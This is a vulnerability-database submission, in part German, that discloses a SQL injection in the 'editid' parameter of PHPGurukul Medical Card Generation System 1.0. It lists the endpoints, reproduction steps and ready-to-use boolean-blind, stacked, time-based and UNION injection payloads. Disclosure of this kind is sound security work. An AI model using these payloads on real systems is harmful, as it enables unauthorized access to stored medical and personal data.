Submit #427403: PHPGurukul Medical Card Generation System - Editid Parameter V1.0 SQL Injectioninfo

TitelPHPGurukul Medical Card Generation System - Editid Parameter V1.0 SQL Injection
BeschreibungI would like to report a SQL injection vulnerability I discovered in the phpgurukul of the Medical Card Generation System during my testing. Details: Affected URL/Endpoint: /mcgs/admin/changeimage.php?editid=1, /mcgs/admin/edit-card-detail.php?editid=1 Vulnerable Parameter: 'editid' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Sign in as admin. 2) Navigate to Managecard > Action 'Edit' > Edit Image 3) Use a proxy like burpsuite to intercept the "card-bwdates-reports-details.php" request. 4) Input the payload to invoke the SQL injection. --- Parameter: editid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: editid=1 AND 3139=3139 Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: editid=1;SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: editid=1 AND (SELECT 5373 FROM (SELECT(SLEEP(5)))VtOj) Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: editid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162717071,0x644d46485475624f4c745a70576f686b4152677175556968674b494d6145446b624a597163747477,0x7178706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- Please let me know if you need further information or a more detailed analysis.
Benutzer
 Delvy (UID 74555)
Einreichung21.10.2024 05:00 (vor 2 Jahren)
Moderieren23.10.2024 13:05 (2 days later)
StatusAkzeptiert
VulDB Eintrag281565 [PHPGurukul Medical Card Generation System 1.0 Managecard Edit Card Detail Page edit-card-detail.php editid SQL Injection]
Punkte17

ZurückÜbersichtWeiter

Want to stay up to date on a daily basis?

Enable the mail alert feature now!